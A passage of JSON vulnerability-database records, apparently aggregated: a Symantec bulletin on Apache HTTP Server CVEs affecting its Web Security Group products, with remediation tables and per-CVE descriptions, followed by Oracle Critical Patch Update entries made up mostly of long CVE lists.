"CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2020-1927", "CVE-2020-1934", "CVE-2020-9490"], "modified": "2020-11-10T00:00:00", "id": "ELSA-2020-4751", "href": "http://linux.oracle.com/errata/ELSA-2020-4751.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}], "symantec": [{"lastseen": "2022-01-11T11:31:28", "description": "**Summary**\n\nSymantec Web Security Group (WSG) products using affected versions of Apache HTTP Server may be susceptible to multiple vulnerabilities. A remote attacker can bypass security controls, modify the behavior of HTTP Server configuration, obtain information from the server process memory, perform XSS attacks, and cause denial of service. A local low-privileged attacker can escalate their privileges on the system.\n\n \n\n**Affected Product(s)**\n\nThe following products and product versions are vulnerable to the CVEs listed. If a CVE is not listed, the product or version is not known to be vulnerable to it.\n\n**Content Analysis (CA)** \n \n--- \n \n**CVE**\n\n| \n\n**Supported Version(s)**\n\n| \n\n**Remediation** \n \nCVE-2019-10098, CVE-2019-0220\n\n| \n\n2.3\n\n| \n\nUpgrade to later release with fixes. \n \n2.4, 3.0, 3.1\n\n| \n\nRemediation is not available at this time. \n \nCVE-2020-1927\n\n| \n\n2.3, 2.4\n\n| \n\nNot vulnerable \n \n3.0, 3.1\n\n| \n\nRemediation is not available at this time. \n \n \n\n \n\n\n**Security Analytics (SA)** \n \n--- \n \n**CVE**\n\n| \n\n**Supported Version(s)**\n\n| \n\n**Remediation** \n \nCVE-2019-0211\n\n| \n\n7.2, 7.3, 8.0\n\n| \n\nUpgrade to later release with fixes. \n \n8.1\n\n| \n\nNot vulnerable, remediation available in 8.1.1. \n \n \n\n**Additional Product Information**\n\nCVE-2019-0211 is exploitable in Security Analytics (SA) only when an authenticated web UI user can create and execute custom Lua scripts for data enrichment workflows. The web UI user must belong to a group that has permissions to modify data enrichment settings and create/edit rules.\n\nThe following products are not vulnerable: \n**Advanced Secure Gateway (ASG) \n****AuthConnector \nBCAAA \nGeneral Auth Connector Login Application \nHSM Agent \nManagement Center (MC) \n****PacketShaper (PS) S-Series \nPolicyCenter (PC) S-Series \nProxySG \nReporter \nSSL Visibility \nSymantec Messaging Gateway (SMG) \nUnified Agent \nWeb Isolation (WI) \nWSS Agent \nWSS Mobile Agent** \n\n \n\n **Issue Details**\n\n**CVE-2018-17189** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nMedium / 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n**References:**\n\n| \n\nNVD: [CVE-2018-17189](<https://nvd.nist.gov/vuln/detail/CVE-2018-17189>) \n \n**Impact:**\n\n| \n\nDenial of service \n \n**Description:**\n\n| \n\nA flaw in the mod_http2 module allows a remote attacker to send crafted HTTP/2 requests and cause denial of service by occupying a server thread. \n \n** **\n\n**CVE-2018-17199** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nHigh / 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n**References:**\n\n| \n\nNVD: [CVE-2018-17199](<https://nvd.nist.gov/vuln/detail/CVE-2018-17199>) \n \n**Impact:**\n\n| \n\nSecurity control bypass \n \n**Description:**\n\n| \n\nA flaw in the mod_session module allows a remote attacker to bypass the session expiry check for sessions stored in HTTP cookies. \n \n** **\n\n**CVE-2019-0190** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nHigh / 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-0190](<https://nvd.nist.gov/vuln/detail/CVE-2019-0190>) \n \n**Impact:**\n\n| \n\nDenial of service \n \n**Description:**\n\n| \n\nA flaw in mod_ssl client renegotiation handling allows a remote attacker to send a crafted request and cause denial of service through excessive CPU consumption. \n \n** **\n\n**CVE-2019-0196** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nMedium / 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-0196](<https://nvd.nist.gov/vuln/detail/CVE-2019-0196>) \n \n**Impact:**\n\n| \n\nDenial of service \n \n**Description:**\n\n| \n\nA flaw in the mod_http2 module allows a remote attacker to send crafted HTTP/2 requests and cause denial of service through invalid memory read access. \n \n** **\n\n**CVE-2019-0197** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nMedium / 4.2 (AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-0197](<https://nvd.nist.gov/vuln/detail/CVE-2019-0197>) \n \n**Impact:**\n\n| \n\nDenial of service, unauthorized modification \n \n**Description:**\n\n| \n\nA flaw in the mod_http2 module allows a remote attacker to upgrade HTTP 1.1 connections to HTTP/2 and cause misconfiguration and denial of service through application crashes. \n \n** **\n\n**CVE-2019-0211** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nHigh / 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-0211](<https://nvd.nist.gov/vuln/detail/CVE-2019-0211>) \n \n**Impact:**\n\n| \n\nPrivilege escalation \n \n**Description:**\n\n| \n\nA flaw in process and thread handling allows an attacker who can execute low-privileged arbitrary code on the web server to escalate their privileges on the system. To execute arbitrary code, the attacker must have local access or the web server must allow clients to upload arbitrary code for execution. \n \n \n\n**CVE-2019-0215** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nHigh / 7.5 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-0215](<https://nvd.nist.gov/vuln/detail/CVE-2019-0215>) \n \n**Impact:**\n\n| \n\nSecurity control bypass \n \n**Description:**\n\n| \n\nA flaw in the mod_ssl module allows a remote attacker to bypass access control restrictions that use client certificate authentication in TLS 1.3 connections. \n \n \n\n**CVE-2019-0217** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nHigh / 7.5 (AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-0217](<https://nvd.nist.gov/vuln/detail/CVE-2019-0217>) \n \n**Impact:**\n\n| \n\nSecurity control bypass \n \n**Description:**\n\n| \n\nA flaw in the mod_auth_digest module allows a remote attacker with valid credentials to authenticate using a different username and bypass access control restrictions. \n \n \n\n**CVE-2019-0220** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nMedium / 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-0220](<https://nvd.nist.gov/vuln/detail/CVE-2019-0220>) \n \n**Impact:**\n\n| \n\nUnauthorized modification \n \n**Description:**\n\n| \n\nA flaw in request handling allows a remote attacker to send crafted requests with multiple slashes ('/') in the URL path component and modify the behavior of configuration directives that match URL path components against regular expressions. \n \n \n\n**CVE-2019-9517** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nHigh / 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-9517](<https://nvd.nist.gov/vuln/detail/CVE-2019-9517>) \n \n**Impact:**\n\n| \n\nDenial of service \n \n**Description:**\n\n| \n\nA flaw in the mod_http2 module allows a remote attacker to send requests for large objects and cause denial of service through excessive CPU and/or memory consumption. \n \n \n\n**CVE-2019-10081** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nHigh / 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-10081](<https://nvd.nist.gov/vuln/detail/CVE-2019-10081>) \n \n**Impact:**\n\n| \n\nDenial of service \n \n**Description:**\n\n| \n\nA flaw in the mod_http2 module allows a remote attacker to send requests that trigger the HTTP/2 server push functionality and cause denial of service through memory corruption and application crashes. Server Push is a feature of the HTTP/2 protocol that allows the web server to push additional objects to the client when the client requests a different but related object. \n \n \n\n**CVE-2019-10082** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nCritical / 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-10082](<https://nvd.nist.gov/vuln/detail/CVE-2019-10082>) \n \n**Impact:**\n\n| \n\nDenial of service \n \n**Description:**\n\n| \n\nA flaw in the mod_http2 module allows a remote attacker to send requests that trigger read-after-free memory accesses and cause denial of service through application crashes. \n \n \n\n**CVE-2019-10092** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nMedium / 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-10092](<https://nvd.nist.gov/vuln/detail/CVE-2019-10092>) \n \n**Impact:**\n\n| \n\nCross-site scripting (XSS) \n \n**Description:**\n\n| \n\nA flaw in the mod_proxy module allows a remote attacker to target a web server user with a crafted link and execute arbitrary code in the user's web browser. The web server must have proxying enabled and be misconfigured in order to show a proxy error page. \n \n \n\n**CVE-2019-10097** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nHigh / 7.2 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-10097](<https://nvd.nist.gov/vuln/detail/CVE-2019-10097>) \n \n**Impact:**\n\n| \n\nDenial of service \n \n**Description:**\n\n| \n\nA flaw in the mod_remoteip module allows a malicious downstream proxy to send crafted PROXY headers and cause denial of service through memory corruption and application crashes. \n \n \n\n**CVE-2019-10098** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nMedium / 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**References:**\n\n| \n\nNVD: [CVE-2019-10098](<https://nvd.nist.gov/vuln/detail/CVE-2019-10098>) \n \n**Impact:**\n\n| \n\nOpen redirection \n \n**Description:**\n\n| \n\nA flaw in the mod_rewrite module allows a remote attacker to target a web server user with crafted links and redirect the user's web browser to an arbitrary URL. This vulnerability is different from CVE-2020-1927. \n \n \n\n**CVE-2020-1927** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nMedium / 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**References:**\n\n| \n\nNVD: [CVE-2020-1927](<https://nvd.nist.gov/vuln/detail/CVE-2020-1927>) \n \n**Impact:**\n\n| \n\nOpen redirection \n \n**Description:**\n\n| \n\nA flaw in the mod_rewrite module allows a remote attacker to target a web server user with crafted links and redirect the user's web browser to an arbitrary URL. This vulnerability is different from CVE-2019-10098. \n \n \n\n**CVE-2020-1934** \n \n--- \n \n**Severity / CVSS v3.x:**\n\n| \n\nMedium / 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**References:**\n\n| \n\nNVD: [CVE-2020-1934](<https://nvd.nist.gov/vuln/detail/CVE-2020-1934>) \n \n**Impact:**\n\n| \n\nInformation disclosure \n \n**Description:**\n\n| \n\nA flaw in the mod_proxy_ftp module allows a remote attacker to connect through the web server to a malicious FTP server and obtain limited contents from the web server process' memory. The target web server must be configured to act as a proxy to a malicious FTP server. \n \n \n \n**References**\n\nApache 2.4 Security Vulnerabilities - <http://httpd.apache.org/security/vulnerabilities_24.html>\n\n**Revisions**\n\n2021-07-15 A fix for Security Analytics 7.2 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2021-04-26 PacketShaper (PS) S-Series and PolicyCenter (PC) S-Series are not vulnerable. \n2021-02-18 A fix for CA 2.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-12-09 A fix for SA 7.3 and 8.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-11-12 Content Analysis 3.1 is vulnerable. \n2020-06-18 initial public release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2020-06-12T20:41:37", "type": "symantec", "title": "Apache HTTP Server Vulnerabilities Jan 2019 - Apr 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17189", "CVE-2018-17199", "CVE-2019-0190", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-0211", "CVE-2019-0215", "CVE-2019-0217", "CVE-2019-0220", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-9517", "CVE-2020-1927", "CVE-2020-1934"], "modified": "2022-01-10T20:21:15", "id": "SMNTC-16056", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oracle": [{"lastseen": "2023-09-27T20:24:21", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 219 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ October 2019 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/epmos/faces/DocumentDisplay?id=2566015.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-01-22T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - October 2019", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5180", "CVE-2015-9251", "CVE-2016-0729", "CVE-2016-1000031", "CVE-2016-4000", "CVE-2016-5425", "CVE-2016-6814", "CVE-2016-7103", "CVE-2016-8610", "CVE-2017-12626", "CVE-2017-16531", "CVE-2017-17558", "CVE-2017-5645", "CVE-2017-6056", "CVE-2017-7656", "CVE-2017-7657", "CVE-2017-7658", "CVE-2017-9735", "CVE-2018-0732", "CVE-2018-1000007", "CVE-2018-1000120", "CVE-2018-1000873", "CVE-2018-11784", "CVE-2018-11798", "CVE-2018-12384", "CVE-2018-12404", "CVE-2018-12536", "CVE-2018-12538", "CVE-2018-12545", "CVE-2018-1320", "CVE-2018-14718", "CVE-2018-14719", "CVE-2018-14720", "CVE-2018-14721", "CVE-2018-15756", "CVE-2018-16842", "CVE-2018-18065", "CVE-2018-18066", "CVE-2018-19360", "CVE-2018-19361", "CVE-2018-19362", "CVE-2018-20685", "CVE-2018-2875", "CVE-2018-3300", "CVE-2018-7185", "CVE-2018-8032", "CVE-2018-8034", "CVE-2018-8037", "CVE-2019-0188", "CVE-2019-0196", "CVE-2019-0197", "CVE-2019-0211", "CVE-2019-0215", "CVE-2019-0217", "CVE-2019-0220", "CVE-2019-0227", "CVE-2019-0232", "CVE-2019-10072", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10098", "CVE-2019-10241", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11068", "CVE-2019-11358", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12814", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", "CVE-2019-1543", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1552", "CVE-2019-1559", "CVE-2019-1563", "CVE-2019-16335", "CVE-2019-17091", "CVE-2019-2734", "CVE-2019-2765", "CVE-2019-2872", "CVE-2019-2883", "CVE-2019-2884", "CVE-2019-2886", "CVE-2019-2887", "CVE-2019-2888", "CVE-2019-2889", "CVE-2019-2890", "CVE-2019-2891", "CVE-2019-2894", "CVE-2019-2895", "CVE-2019-2896", "CVE-2019-2897", "CVE-2019-2898", "CVE-2019-2899", "CVE-2019-2900", "CVE-2019-2901", "CVE-2019-2902", "CVE-2019-2903", "CVE-2019-2904", "CVE-2019-2905", "CVE-2019-2906", "CVE-2019-2907", "CVE-2019-2909", "CVE-2019-2910", "CVE-2019-2911", "CVE-2019-2913", "CVE-2019-2914", "CVE-2019-2915", "CVE-2019-2920", "CVE-2019-2922", "CVE-2019-2923", "CVE-2019-2924", "CVE-2019-2925", "CVE-2019-2926", "CVE-2019-2927", "CVE-2019-2929", "CVE-2019-2930", "CVE-2019-2931", "CVE-2019-2932", "CVE-2019-2933", "CVE-2019-2934", "CVE-2019-2935", "CVE-2019-2936", "CVE-2019-2937", "CVE-2019-2938", "CVE-2019-2939", "CVE-2019-2940", "CVE-2019-2941", "CVE-2019-2942", "CVE-2019-2943", "CVE-2019-2944", "CVE-2019-2945", "CVE-2019-2946", "CVE-2019-2947", "CVE-2019-2948", "CVE-2019-2949", "CVE-2019-2950", "CVE-2019-2951", "CVE-2019-2952", "CVE-2019-2953", "CVE-2019-2954", "CVE-2019-2955", "CVE-2019-2956", "CVE-2019-2957", "CVE-2019-2958", "CVE-2019-2959", "CVE-2019-2960", "CVE-2019-2961", "CVE-2019-2962", "CVE-2019-2963", "CVE-2019-2964", "CVE-2019-2965", "CVE-2019-2966", "CVE-2019-2967", "CVE-2019-2968", "CVE-2019-2969", "CVE-2019-2970", "CVE-2019-2971", "CVE-2019-2972", "CVE-2019-2973", "CVE-2019-2974", "CVE-2019-2975", "CVE-2019-2976", "CVE-2019-2977", "CVE-2019-2978", "CVE-2019-2979", "CVE-2019-2980", "CVE-2019-2981", "CVE-2019-2982", "CVE-2019-2983", "CVE-2019-2984", "CVE-2019-2985", "CVE-2019-2986", "CVE-2019-2987", "CVE-2019-2988", "CVE-2019-2989", "CVE-2019-2990", "CVE-2019-2991", "CVE-2019-2992", "CVE-2019-2993", "CVE-2019-2994", "CVE-2019-2995", "CVE-2019-2996", "CVE-2019-2997", "CVE-2019-2998", "CVE-2019-2999", "CVE-2019-3000", "CVE-2019-3001", "CVE-2019-3002", "CVE-2019-3003", "CVE-2019-3004", "CVE-2019-3005", "CVE-2019-3008", "CVE-2019-3009", "CVE-2019-3010", "CVE-2019-3011", "CVE-2019-3012", "CVE-2019-3014", "CVE-2019-3015", "CVE-2019-3017", "CVE-2019-3018", "CVE-2019-3019", "CVE-2019-3020", "CVE-2019-3021", "CVE-2019-3022", "CVE-2019-3023", "CVE-2019-3024", "CVE-2019-3025", "CVE-2019-3026", "CVE-2019-3027", "CVE-2019-3028", "CVE-2019-3031", "CVE-2019-3855", "CVE-2019-3856", "CVE-2019-3857", "CVE-2019-3858", "CVE-2019-3859", "CVE-2019-3860", "CVE-2019-3861", "CVE-2019-3862", "CVE-2019-3863", "CVE-2019-5435", "CVE-2019-5436", "CVE-2019-5443", "CVE-2019-6109", "CVE-2019-6111", "CVE-2019-8457", "CVE-2019-9511", "CVE-2019-9517", "CVE-2019-9936", "CVE-2019-9937"], "modified": "2019-10-15T00:00:00", "id": "ORACLE:CPUOCT2019", "href": "https://www.oracle.com/security-alerts/cpuoct2019.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-27T20:24:19", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Please refer to:\n\n * [Critical Patch Updates, Security Alerts and Bulletins](<https://www.oracle.com/security-alerts>) for information about Oracle Security advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 444 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ July 2020 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2684313.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - July 2020", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501", "CVE-2015-8607", "CVE-2015-8608", "CVE-2015-9251", "CVE-2016-0701", "CVE-2016-1000031", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-1923", "CVE-2016-1924", "CVE-2016-2183", "CVE-2016-2381", "CVE-2016-3183", "CVE-2016-4000", "CVE-2016-4796", "CVE-2016-4797", "CVE-2016-5017", "CVE-2016-5019", "CVE-2016-6306", "CVE-2016-6814", "CVE-2016-8332", "CVE-2016-8610", "CVE-2016-9112", "CVE-2016-9840", "CVE-2016-9841", "CVE-2016-9842", "CVE-2016-9843", "CVE-2017-0861", "CVE-2017-10140", "CVE-2017-12610", "CVE-2017-12626", "CVE-2017-12814", "CVE-2017-12837", "CVE-2017-12883", "CVE-2017-15265", "CVE-2017-15708", "CVE-2017-5637", "CVE-2017-5645", "CVE-2018-1000004", "CVE-2018-1000632", "CVE-2018-10237", "CVE-2018-10675", "CVE-2018-10872", "CVE-2018-10901", "CVE-2018-11039", "CVE-2018-11040", "CVE-2018-11054", "CVE-2018-11055", "CVE-2018-11056", "CVE-2018-11057", "CVE-2018-11058", "CVE-2018-11776", "CVE-2018-1199", "CVE-2018-12015", "CVE-2018-12023", "CVE-2018-12207", "CVE-2018-1257", "CVE-2018-1258", "CVE-2018-1270", "CVE-2018-1271", "CVE-2018-1272", "CVE-2018-1275", "CVE-2018-1288", "CVE-2018-15756", "CVE-2018-15769", "CVE-2018-17190", "CVE-2018-17196", "CVE-2018-18311", "CVE-2018-18312", "CVE-2018-18313", "CVE-2018-18314", "CVE-2018-3620", "CVE-2018-3639", "CVE-2018-3646", "CVE-2018-3665", "CVE-2018-3693", "CVE-2018-5390", "CVE-2018-6616", "CVE-2018-6797", "CVE-2018-6798", "CVE-2018-6913", "CVE-2018-7566", "CVE-2018-8012", "CVE-2018-8013", "CVE-2018-8032", "CVE-2018-8088", "CVE-2019-0188", "CVE-2019-0201", "CVE-2019-0220", "CVE-2019-0222", "CVE-2019-0227", "CVE-2019-10081", "CVE-2019-10082", "CVE-2019-10086", "CVE-2019-10092", "CVE-2019-10097", "CVE-2019-10192", "CVE-2019-10193", "CVE-2019-10246", "CVE-2019-10247", "CVE-2019-11358", "CVE-2019-12086", "CVE-2019-12384", "CVE-2019-12402", "CVE-2019-12415", "CVE-2019-12423", "CVE-2019-12814", "CVE-2019-12973", "CVE-2019-13990", "CVE-2019-14379", "CVE-2019-14439", "CVE-2019-14540", "CVE-2019-14862", "CVE-2019-14893", "CVE-2019-1547", "CVE-2019-1549", "CVE-2019-1551", "CVE-2019-1552", "CVE-2019-1563", "CVE-2019-16056", "CVE-2019-16335", "CVE-2019-16935", "CVE-2019-16942", "CVE-2019-16943", "CVE-2019-17091", "CVE-2019-17267", "CVE-2019-17359", "CVE-2019-17531", "CVE-2019-17560", "CVE-2019-17561", "CVE-2019-17563", "CVE-2019-17569", "CVE-2019-17571", "CVE-2019-17573", "CVE-2019-19956", "CVE-2019-20330", "CVE-2019-20388", "CVE-2019-2094", "CVE-2019-2725", "CVE-2019-2729", "CVE-2019-2904", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-5427", "CVE-2019-5489", "CVE-2019-8457", "CVE-2020-10650", "CVE-2020-10672", "CVE-2020-10673", "CVE-2020-10683", "CVE-2020-10968", "CVE-2020-10969", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11111", "CVE-2020-11112", "CVE-2020-11113", "CVE-2020-11619", "CVE-2020-11620", "CVE-2020-11655", "CVE-2020-11656", "CVE-2020-13434", "CVE-2020-13435", "CVE-2020-13630", "CVE-2020-13631", "CVE-2020-13632", "CVE-2020-14527", "CVE-2020-14528", "CVE-2020-14529", "CVE-2020-14530", "CVE-2020-14531", "CVE-2020-14532", "CVE-2020-14533", "CVE-2020-14534", "CVE-2020-14535", "CVE-2020-14536", "CVE-2020-14537", "CVE-2020-14539", "CVE-2020-14540", "CVE-2020-14541", "CVE-2020-14542", "CVE-2020-14543", "CVE-2020-14544", "CVE-2020-14545", "CVE-2020-14546", "CVE-2020-14547", "CVE-2020-14548", "CVE-2020-14549", "CVE-2020-14550", "CVE-2020-14551", "CVE-2020-14552", "CVE-2020-14553", "CVE-2020-14554", "CVE-2020-14555", "CVE-2020-14556", "CVE-2020-14557", "CVE-2020-14558", "CVE-2020-14559", "CVE-2020-14560", "CVE-2020-14561", "CVE-2020-14562", "CVE-2020-14563", "CVE-2020-14564", "CVE-2020-14565", "CVE-2020-14566", "CVE-2020-14567", "CVE-2020-14568", "CVE-2020-14569", "CVE-2020-14570", "CVE-2020-14571", "CVE-2020-14572", "CVE-2020-14573", "CVE-2020-14574", "CVE-2020-14575", "CVE-2020-14576", "CVE-2020-14577", "CVE-2020-14578", "CVE-2020-14579", "CVE-2020-14580", "CVE-2020-14581", "CVE-2020-14582", "CVE-2020-14583", "CVE-2020-14584", "CVE-2020-14585", "CVE-2020-14586", "CVE-2020-14587", "CVE-2020-14588", "CVE-2020-14589", "CVE-2020-14590", "CVE-2020-14591", "CVE-2020-14592", "CVE-2020-14593", "CVE-2020-14594", "CVE-2020-14595", "CVE-2020-14596", "CVE-2020-14597", "CVE-2020-14598", "CVE-2020-14599", "CVE-2020-14600", "CVE-2020-14601", "CVE-2020-14602", "CVE-2020-14603", "CVE-2020-14604", "CVE-2020-14605", "CVE-2020-14606", "CVE-2020-14607", "CVE-2020-14608", "CVE-2020-14609", "CVE-2020-14610", "CVE-2020-14611", "CVE-2020-14612", "CVE-2020-14613", "CVE-2020-14614", "CVE-2020-14615", "CVE-2020-14616", "CVE-2020-14617", "CVE-2020-14618", "CVE-2020-14619", "CVE-2020-14620", "CVE-2020-14621", "CVE-2020-14622", "CVE-2020-14623", "CVE-2020-14624", "CVE-2020-14625", "CVE-2020-14626", "CVE-2020-14627", "CVE-2020-14628", "CVE-2020-14629", "CVE-2020-14630", "CVE-2020-14631", "CVE-2020-14632", "CVE-2020-14633", "CVE-2020-14634", "CVE-2020-14635", "CVE-2020-14636", "CVE-2020-14637", "CVE-2020-14638", "CVE-2020-14639", "CVE-2020-14640", "CVE-2020-14641", "CVE-2020-14642", "CVE-2020-14643", "CVE-2020-14644", "CVE-2020-14645", "CVE-2020-14646", "CVE-2020-14647", "CVE-2020-14648", "CVE-2020-14649", "CVE-2020-14650", "CVE-2020-14651", "CVE-2020-14652", "CVE-2020-14653", "CVE-2020-14654", "CVE-2020-14655", "CVE-2020-14656", "CVE-2020-14657", 